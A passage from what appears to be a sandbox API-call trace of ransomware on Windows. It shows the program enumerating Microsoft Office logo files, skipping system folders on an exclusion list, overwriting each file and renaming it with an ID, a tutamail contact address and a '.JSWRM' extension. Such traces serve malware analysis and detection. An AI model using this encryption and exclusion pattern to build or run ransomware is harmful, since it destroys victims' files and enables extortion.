lpWideCharStr="OneNoteLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.344] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2037) returned 1 [0133.344] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.344] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7f0, lpOverlapped=0x0) returned 1 [0133.346] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.346] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7f0, lpOverlapped=0x0) returned 1 [0133.346] CloseHandle (hObject=0x238) returned 1 [0133.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.347] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x896, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-white_scale-100.png", cAlternateFileName="ON2104~1.PNG")) returned 1 [0133.347] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.347] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.348] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.349] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2198) returned 1 [0133.349] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.349] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x890, lpOverlapped=0x0) returned 1 [0133.350] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.350] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x890, lpOverlapped=0x0) returned 1 [0133.351] CloseHandle (hObject=0x238) returned 1 [0133.351] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.352] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xab5, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-white_scale-140.png", cAlternateFileName="ONENOT~1.PNG")) returned 1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="perflogs") returned -1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.352] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.353] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2741) returned 1 [0133.353] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.353] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xab0, lpOverlapped=0x0) returned 1 [0133.355] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.355] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xab0, lpOverlapped=0x0) returned 1 [0133.355] CloseHandle (hObject=0x238) returned 1 [0133.355] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.356] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdb7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-white_scale-180.png", cAlternateFileName="ON8260~1.PNG")) returned 1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="perflogs") returned -1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.356] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.357] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3511) returned 1 [0133.357] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.357] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xdb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xdb0, lpOverlapped=0x0) returned 1 [0133.359] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.359] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xdb0, lpOverlapped=0x0) returned 1 [0133.359] CloseHandle (hObject=0x238) returned 1 [0133.359] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.377] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x806, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-white_scale-80.png", cAlternateFileName="ONENOT~4.PNG")) returned 1 [0133.377] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.377] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.377] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.377] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.377] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.378] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.378] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.378] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.378] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.378] lstrcmpiW (lpString1="OneNoteLogo.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0133.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-white_scale-80.png", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 39 [0133.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.379] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2054) returned 1 [0133.379] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.379] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0133.380] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.380] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0133.380] CloseHandle (hObject=0x238) returned 1 [0133.381] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.382] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8db, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.scale-100.png", cAlternateFileName="ONENOT~3.PNG")) returned 1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2=".") returned 1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="..") returned 1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="...") returned 1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="windows") returned -1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="recovery") returned -1 [0133.382] lstrcmpiW (lpString1="OneNoteLogo.scale-100.png", lpString2="perflogs") returned -1 [0133.382] lstrcmpiW 